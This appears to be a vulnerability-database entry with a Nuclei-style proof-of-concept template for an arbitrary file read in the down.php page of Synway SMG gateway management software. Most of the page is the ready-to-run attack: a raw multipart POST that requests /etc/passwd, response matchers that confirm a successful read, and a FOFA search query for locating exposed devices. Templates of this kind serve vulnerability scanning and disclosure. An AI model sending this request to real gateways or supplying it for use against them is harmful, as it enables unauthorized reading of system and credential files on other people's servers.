sanhui-smg-file-read: Synway SMG Gateway down.php - Arbitrary File Read

2025-08-01 sanhui smg PoC Public

Description

There is an arbitrary file reading vulnerability in the down.php file of Synway SMG gateway management software, through which an attacker can download any file from the server.

PoC

id: sanhui-smg-file-read

info:
  name: Synway SMG Gateway down.php - Arbitrary File Read
  author: SleepingBag945
  severity: high
  description: |
    There is an arbitrary file reading vulnerability in the down.php file of Synway SMG gateway management software, through which an attacker can download any file from the server.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%89%E6%B1%87SMG%20%E7%BD%91%E5%85%B3%E7%AE%A1%E7%90%86%E8%BD%AF%E4%BB%B6%20down.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="text ml10 mr20" && title="网关管理软件"
  tags: sanhui-smg,lfi,gateway,intrusive,vuln

http:
  - raw:
      - |
        POST /down.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfA9vzLuw6Gmtnmv2

        ------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
        Content-Disposition: form-data; name="downfile"

        /etc/passwd
        ------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
        Content-Disposition: form-data; name="down"

        下载
        ------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
        Content-Disposition: form-data; name="runinfoupdate"

        ------WebKitFormBoundaryfA9vzLuw6Gmtnmv2--

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"
          - "filename=passwd"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402204b3dce13ab7c1bed8ed0f26c76bc2c8e27fc302574ebd5bebcda7bca624415500220185707860204052059ed03935d2b0f2d70f8643ee1422e3bd0b87ebf23b06fc3:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities